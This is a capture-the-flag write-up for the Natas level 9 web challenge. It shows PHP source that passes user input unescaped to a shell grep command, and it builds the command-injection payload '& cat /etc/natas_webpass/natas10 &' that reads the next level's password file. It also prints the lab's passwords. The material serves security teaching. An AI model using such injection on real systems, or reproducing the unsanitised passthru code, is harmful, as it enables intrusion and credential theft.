## Login
- username: `natas9`
- password: `Sda6t0vkOPkM8YeOZkAGVhFoaplvlJFd`

## Challenge

We are greeted with a webpage showing the message "Find word containing:" and an input field and a search button.
Below that we have a label "Output" as well as our common `View sourcecode` link.

Entering some letters returns back output of words containing the entered letters, for example endering `ab` and then clicking search returns the following output (excerpt):

```
Sabbath
Sabbath's
Sabbaths
abaci
aback
[...]
```

Looking at the sourcecode we see the following:

```html
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>
```

So, our input is tied to the parameter `needle` which is then sent as a GET parameter to the website.
If the GET parameter `needle` exists, its value is assigned to the `$key` variable.
That `$key` variable is then used as an argument to `grep -i`.

If we didn't know what `grep` does or how it works, we would now have a thorough read of `man grep`.
Luckily we do know that `grep` searches for a regex pattern within a given file, in this case `dictionary.txt`.
The [passthru docs](https://www.php.net/manual/en/function.passthru.php) also reveal that the given string is executed as a command, which i would assume is similar to having control over an executed shell command.

With the general knowledge that our desired password is present in `/etc/natas_webpass/natas10` we can now build a string that cats out the contents of that file.

In shell scripts, you can "parallelize" tasks by concatenating them via a single `&` character.
We want to execute the command `cat /etc/natas_webpass/natas10` and can therefore build the following payload:

```sh
& cat /etc/natas_webpass/natas10 &
```

This will execute all "three" commands `grep -i`, `cat /etc/natas_webpass/natas10` and `dictionary.txt`.
Luckily, if we concatenate them with a single `&` it does not matter whether some of the commands fail, we just get the result of all three of them.

This is our output:

```
D44EcsFkLxPIkAAKLosx8z3hxX1Z4MCE
```
